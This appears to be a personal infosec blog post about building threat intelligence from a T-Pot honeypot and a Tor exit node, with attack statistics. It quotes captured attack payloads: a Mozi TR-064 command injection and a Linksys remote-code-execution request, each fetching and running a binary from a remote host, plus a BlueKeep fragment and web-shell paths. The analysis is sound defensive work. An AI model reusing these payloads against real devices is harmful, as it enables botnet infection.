Threat intelligence, building your citadel


~ 5 minute read
Crafted : 3 months ago Updated : 3 months ago
Tags:
#infosec #information-security #vulnerability #threat-intelligence #honypot #tor #exit-node

Hello Luvs,

This post is just a brain dump on data intelligence and flying packets. Packets aren't the only source of data, but this post is mostly about packets. I'll give you pieces of information here and there you connect the dots. 

 

Table Of Contents 

 

It starts with packets. 

Security companies, security researchers, and governments are digging packets alike. We can extract a lot of information from packets. But the first question is where and how to get the right packets?! As a side project during the past month, I tried to gather some data to conduct a few analyses. Here is what I did.

 

  • Managed a honeypot
  • Ran a TOR exit node and passively logged packets 

 

Honeypot 

 

This one is interesting. I was thinking about combining various honeypots to maximize the amount of data we can gather and not so surprisingly someone already did it before, and they did it right!

T-POT 

T-Pot is based on the network installer Debian (Stretch). During installation, the whole system will be updated to Debian (Sid). The honeypot daemons, as well as other support components being used, have been containerized using docker. This allows us to run multiple honeypot daemons on the same network interface while maintaining a small footprint and constrain each honeypot within its own environment.

In T-Pot, we combine the dockerized honeypots ...

Omg, that's what I been looking for. So here is what I did. I created a Debian 9.7 (Stretch) in the cloud and ran this.

git clone https://github.com/dtag-dev-sec/tpotce

cd tpotce/iso/installer/

./install.sh --type=user

 

And that's it here we have a fully functional honeypot with a beautiful Kibana dashboard to help us analyze data.

 

Tor Exit node

All you need is head to https://tor-relay.co. They will take your hand and even tell you which hosting allows TOR Exit nodes. This picture shows you what's going on.

 

Show me some data 

 

Attack by country and percentage of known attackers IP

 

Attack by country and ports 

 

Most used username and password 

 

 

More Details 

Here is what's going on my one of honeypots in less than 3 weeks. 
 

3,415,160

Dionaea - Attacks

1,652,109

Cowrie - Attacks

652,505

Honeytrap - Attacks

502,539

Heralding - Attacks

39,614

Rdpy - Attacks

7,167

Tanner - Attacks

3,885

Adbhoney - Attacks

3,480

Mailoney - Attacks

1,203

Ciscoasa - Attacks

54

ElasticPot - Attacks

 

 

Exploits and Vulnerabilities 

Here example exploits we see in the logs. 

 

For example, we can see Mozi still actively trying to infect various hosts. 


<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>

 

The other attempts are recent blue keep exploit. look at MS_T120 .

........e............0 ..."............................0 ........................... ....0 ........................................|............Duca.......... .X.........( ..r.d.p.s.c.a.n………………………………………………………………………………………………………………………………………………………………………………………….MS_T120.....

 

Linksys E-series - Remote Code Execution

 

ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+mipsel%3B+wget+http%3A%2F%2F94.177.249.95%2Fmipsel%3B+chmod+777+mipsel%3B+.%2Fmipsel+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1

 

Brute Force

Both directory guessing and password spray, They also do love brute-forcing MSSQL SA account just like the '90s. Directory brute force for finding other's web-shells or a vulnerable file. 

 

...

/no1.php

/9678.php

/5678.php

/wuwu11.php

...

 

Blackhat SEO attempts 
 

www.google.co.jp:80 with data b'GET /search?complete=0&hl=en&q=site%3Ajp+inurl%3A%22mackerel7%22+%22.aspx%3Fid%3D%22&num=100&start=0&

 

Too much data on how to handle it?

Well, it really depends on you how deep you want to search, but usually, we can start by gathering obvious stuff like URLs and download the files and analysis them. Most of the downloaded files are simply bots or other kind of malicious tools. Also, sometimes you may reverse the main function and find a kill switch HTTP URL for a wanna cry.

 

Conclusions

Blackhats aren't so smart?

Aren't they now? Well, most of the attackers We see in the honeypot packets are script kiddies running public (and mostly outdated) exploits in the hope of scoring something. There also been a debate on infosec twitter about banning offensive security tools because a lot of attackers are dumb and can't create their own tools and script. Well, it may sound correct, but unfortunately, that's not the case; there are also skilled cyber actors out there; that's why, as I said on twitter earlier. If your security solution really can't detect unobfuscated or slightly obfuscated PowerShell scripts, either your organization isn't trustworthy, or your security solution is duh! Defensive companies, if keeping up with offensive techniques and tools, In the long run, releasing offensive security tools and exploit (not dropping 0days and at the right time) will help nothing but more security.

There is more 

As I said, in the beginning, this setup will not record everything. 

Here is what you ideally want. 

 

     

Basically, you want to parse everything in a logging center next using ML you can extract almost anything from 0days to even "predicting someone next password" ;) also you can relate logs to each other from the leaked databases to Honeypots logs. As a side project, my resources are minimal, but for someone with deep pockets for better results, you want to have A server in each region and country to make sure you can even capture targeted attacks. (just like VPN servers) So now what? Well, now you build your own threat intelligence empire, it's time to cleanse and make sense of data. 

Be very careful, my friends, "with great power comes great responsibility." do not abuse your knowledge instead, contribute to people's privacy and security. 

 

PS: If you are a legit security researcher or company and like to access my honeypots or nodes data, feel free to contact me.

 

Happy new year, and happy hunting. 

 

Assist me:
Buy Me a Coffee at ko-fi.com